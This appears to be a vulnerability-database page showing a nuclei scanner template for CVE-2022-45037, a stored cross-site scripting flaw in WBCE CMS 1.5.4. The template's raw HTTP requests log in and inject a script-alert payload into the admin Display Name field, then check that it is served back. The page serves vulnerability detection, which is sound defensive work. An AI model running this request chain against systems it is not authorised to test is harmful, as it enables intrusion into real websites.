Lucene search
K

WBCE CMS v1.5.4 - Cross Site Scripting (Stored)

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 40 Views

WBCE CMS v1.5.4 - Cross Site Scripting vulnerability allows arbitrary code execution via Display Name fiel

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-45037
25 Nov 202218:20
circl
CNNVD
WBCE CMS 跨站脚本漏洞
25 Nov 202200:00
cnnvd
CVE
CVE-2022-45037
25 Nov 202200:00
cve
Cvelist
CVE-2022-45037
25 Nov 202200:00
cvelist
NVD
CVE-2022-45037
25 Nov 202216:15
nvd
Prion
Cross site scripting
25 Nov 202216:15
prion
Positive Technologies
PT-2022-27382 · Wbce Cms · Wbce Cms
25 Nov 202200:00
ptsecurity
RedhatCVE
CVE-2022-45037
23 May 202500:16
redhatcve
Vulnrichment
CVE-2022-45037
25 Nov 202200:00
vulnrichment
id: CVE-2022-45037

info:
  name: WBCE CMS v1.5.4 - Cross Site Scripting (Stored)
  author: theamanrawat
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version of WBCE CMS or apply the necessary patches provided by the vendor to fix the Cross Site Scripting vulnerability.
  reference:
    - https://github.com/WBCE/WBCE_CMS
    - https://shimo.im/docs/dPkpKPQEjXfvYoqO/read
    - https://nvd.nist.gov/vuln/detail/CVE-2022-45037
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-45037
    cwe-id: CWE-79
    epss-score: 0.01024
    epss-percentile: 0.59322
    cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 5
    vendor: wbce
    product: wbce_cms
  tags: cve,cve2022,xss,wbce,cms,authenticated,vuln

http:
  - raw:
      - |
        GET /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
      - |
        GET /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        formtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
      - |
        GET /admin/users/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_5
        words:
          - "<script>alert(document.domain)</script>"
          - "SESSION_TIMEOUT"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: username_fieldname
        group: 1
        regex:
          - 'name="username_fieldname" value="(.*)"'
        internal: true
        part: body

      - type: regex
        name: password_fieldname
        group: 1
        regex:
          - 'name="password_fieldname" value="(.*)"'
        internal: true
        part: body

      - type: regex
        name: formtoken
        group: 1
        regex:
          - 'name="formtoken" value="(.*)"'
        internal: true
        part: body

      - type: regex
        name: username_fieldname_2
        group: 1
        regex:
          - 'name="username_fieldname" value="(.*)"'
        internal: true
        part: body
# digest: 490a0046304402205ae4d27f5ac74b91c52bcb5fd74ae7afd1fb0d509bc345be909cd7654967f5f7022004b1cf99749ff51f2685cb65fa6081ea2e86e360e06ec7ad20773eb0c15098d1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.15.4
EPSS0.01024
SSVC
40